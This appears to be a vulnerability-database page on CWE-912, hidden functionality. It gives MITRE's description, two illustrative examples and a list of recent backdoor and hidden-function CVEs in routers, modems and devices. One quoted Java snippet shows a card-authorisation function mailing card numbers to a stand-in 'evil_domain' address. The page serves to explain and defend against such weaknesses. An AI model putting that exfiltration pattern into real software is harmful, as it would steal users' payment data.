Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-912 (隐藏功能) — Vulnerability Class 69

69 vulnerabilities classified as CWE-912 (隐藏功能). AI Chinese analysis included.

CWE-912 represents a software weakness where undocumented, unspecified, or non-obvious functionality exists within a product, often bypassing standard user interfaces or administrative controls. This vulnerability is typically exploited by attackers who discover these hidden pathways, such as debug ports, developer shortcuts, or intentional backdoors, to gain unauthorized access or execute malicious actions without detection. Developers can mitigate this risk by enforcing strict code reviews to identify and remove unnecessary or obscure code paths, ensuring comprehensive documentation of all features, and implementing rigorous access controls that restrict visibility to only intended, documented interfaces. By adhering to secure coding standards and maintaining clear separation between production and development code, organizations can eliminate unintended entry points, thereby reducing the attack surface and preventing adversaries from leveraging hidden mechanisms for unauthorized system manipulation or data exfiltration.

MITRE CWE Description
The product contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the product's users or administrators. Hidden functionality can take many forms, such as intentionally malicious code, "Easter Eggs" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the product's attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application.
Common Consequences (1)
Other, IntegrityVaries by Context, Alter Execution Logic
Mitigations (1)
InstallationAlways verify the integrity of the product that is being installed.
Examples (2)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.
Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.
Bad · Other
CVE IDTitleCVSSSeverityPublished
CVE-2026-7413 Persistent undocumented backdoor access in Yarbo robot — Firmware 7.2 High2026-05-07
CVE-2026-41446 WattBox 800 & 820 Series < 2.10.0.0 RCE via Diagnostic Endpoints — WattBox 800 9.8 Critical2026-04-28
CVE-2026-1952 Denial of service via the undocumented subfunction in AS320T — AS320T 9.8 Critical2026-04-24
CVE-2026-4621 NEC Platforms Aterm Series 安全漏洞 — Aterm W1200EX(-MS) 5.3 -2026-03-27
CVE-2026-33280 BUFFALO Wi-Fi router 安全漏洞 — BUFFALO Wi-Fi router products 9.8 -2026-03-27
CVE-2026-31847 Hidden Functionality Enables Remote Telnet Activation via /goform/setSysTools in Nexxt Nebula 300+ — Nebula 300+ 9.8 -2026-03-23
CVE-2026-3587 Hidden CLI Function Allows Root Access — Lean Managed Switch 852-1812 10.0 Critical2026-03-23
CVE-2025-48418 Fortinet多款产品 安全漏洞 — FortiAnalyzer 6.4 Medium2026-03-10
CVE-2026-1741 EFM ipTIME A8004T Debug d.cgi httpcon_check_session_url backdoor — ipTIME A8004T 6.6 Medium2026-02-02
CVE-2025-55704 Brother Industries Brother MFPs 安全漏洞 — Multiple MFPs 5.3 Medium2026-01-29
CVE-2025-11544 Sharp NP series 安全漏洞 — NP-P627UL, NP-P627ULG, NP-P627UL+, NP-P547UL, NP-P547ULG, NP-P607UL+, NP-CG6600UL, NP-H6271UL, NP-H5471UL, NP-P627ULH, NP-P547ULH, NP-PE455UL, NP-PE455ULG, NP-PE455WL, NP-PE455WLG, NP-PE505XLG, NP-CG6500XL, NP-CG6400UL, NP-CG6400WL, NP-CB4500XL, NP-CA4120X, NP-CA4160W, NP-CA4160X, NP-CA4200U, NP-CA4200W, NP-CA4202W, NP-CA4260X, NP-CA4300X, NP-CA4355X, NP-CD2100U, NP-CD2120X, NP-CD2300X, NP-CR2100X, NP-CR2170W, NP-CR2170X, NP-CR2200U, NP-CR2200W, NP-CR2280X, NP-CR2310X, NP-CR2350X, NP-MC302XG, NP-MC332WG, NP-MC342XG, NP-MC372X, NP-MC372XG, NP-MC382W, NP-MC382WG, NP-MC422XG, NP-ME342UG, NP-ME372W, NP-ME372WG, NP-ME382U, NP-ME382UG, NP-ME402X, NP-ME402XG, NP-P525UL, NP-P525ULG, NP-P525UL+, NP-P525WL, NP-P525WLG, NP-P525WL+, NP-P605UL, NP-P605ULG, NP-P605UL+, NP-CG6500UL, NP-CG6500WL, NP-CB4500UL, NP-CB4500WL, NP-P525ULH, NP-P525WLH, NP-P605ULH, NP-P554U, NP-P554UG, NP-P554U+, NP-P554W, NP-P554WG, NP-P554W+, NP-P474U, NP-P474UG, NP-P474W, NP-P474WG, NP-P604XG, NP-P604X+, NP-P603XG, NP-P523X+, NP-PE523XG, NP-PE523X+, NP-CF6600U, NP-CF6600W, NP-CF6700X, NP-CF6500X, NP-CB4600U, NP-P554UH, NP-P554WH, NP-P474UH, NP-P474WH, NP-P604XH, NP-P603XH, NP-PE523XH, NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG ,NP-ME401W, NP-ME361W, NP-ME331W, NP-ME301W, NP-ME401X, NP-ME361X, NP-ME331X, NP-ME301X, NP-ME401WG, NP-ME361WG, NP-ME331WG, NP-ME301WG, NP-ME401XG, NP-ME361XG, NP-ME331XG, NP-ME301XG, NP-CA4155W, NP-CA4350X, NP-CA4255X, NP-CA4155X, NP-CA4115X, NP-MC331WG, NP-MC421XG, NP-MC401XG, NP-MC371XG, NP-MC331XG, NP-MC301XG, NP-CK4155W, NP-CK4255X, NP-CK4155X, NP-CK4055X, NP-CM4150X, NP-CM4050X, NP-CK4155WG, NP-CK4255XG, NP-CK4155XG, NP-CR2165W, NP-CR2305X, NP-CR2275X, NP-CR2165X, NP-CR2155X, NP-CD2115X, NP-CD2105X, NP-CM4151X, NP-CR2276X, NP-CD2116X, NP-P502H, NP-P502W, NP-P452H, NP-P452W 7.7AIHighAI2025-12-22
CVE-2025-62773 Mercku M6a 安全漏洞 — M6a 2.4 Low2025-10-22
CVE-2025-58778 Ruijie RG-EST300 安全漏洞 — RG-EST300 9.8AICriticalAI2025-10-16
CVE-2025-11673 PiExtract |SOOP-CLM - Hidden Functionality — SOOP-CLM 7.2 High2025-10-13
CVE-2025-55075 I-O DATA WN-7D36QR 安全漏洞 — WN-7D36QR 4.9 Medium2025-09-17
CVE-2025-30064 Possibility to generate a session for any user via the "ex:action" parameter after obtaining access to the JWT key — CGM CLININET 9.1AICriticalAI2025-08-27
CVE-2025-9382 FNKvision Y215 CCTV Camera Telnet Sevice s1_rf_test_config backdoor — Y215 CCTV Camera 6.4 Medium2025-08-24
CVE-2010-20103 ProFTPD 1.3.3c Backdoor Command Execution — ProFTPD (Professional FTP Daemon) 9.8AICriticalAI2025-08-20
CVE-2025-8938 TOTOLINK N350R Telnet Service formSysTel backdoor — N350R 6.3 Medium2025-08-14
CVE-2011-10018 myBB 1.6.4 Backdoor Arbitrary Command Execution — Forum Software 9.8AICriticalAI2025-08-13
CVE-2025-46267 ELECOM WRC-BE36QS-B和ELECOM WRC-W701-B 安全漏洞 — WRC-BE36QS-B 4.9 Medium2025-07-22
CVE-2025-34117 Netcore / Netis Routers RCE via UDP Port 53413 Backdoor — Router firmware 9.8AICriticalAI2025-07-16
CVE-2025-6839 Conjure Position Department Service Quality Evaluation System head.php eval backdoor — Position Department Service Quality Evaluation System 6.3 Medium2025-06-29
CVE-2025-26412 Undocumented Root Shell Access in SIMCom SIM7600G Modem — SIM7600G Modem 9.8AICriticalAI2025-06-11
CVE-2025-48416 Backdoor Functionality via SSH in eCharge Hardy Barth cPH2 / cPP2 charging stations — cPH2 / cPP2 charging stations 9.8AICriticalAI2025-05-21
CVE-2025-47729 TeleMessage archiving backend 安全漏洞 — archiving backend 1.9 Low2025-05-08
CVE-2025-32370 Kentico Xperience 安全漏洞 — Xperience 7.2 High2025-04-06
CVE-2025-2894 Unitree Go1 Robot Dog Backdoor Control Channel — Go1 6.6 Medium2025-03-28
CVE-2025-27840 Espressif ESP32 安全漏洞 — ESP32 6.8 Medium2025-03-08
CVE-2025-1204 Contec Health CMS8000 Patient Monitor 安全漏洞 — CMS8000 Patient Monitor 7.7 -2025-02-25

Vulnerabilities classified as CWE-912 (隐藏功能) represent 69 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.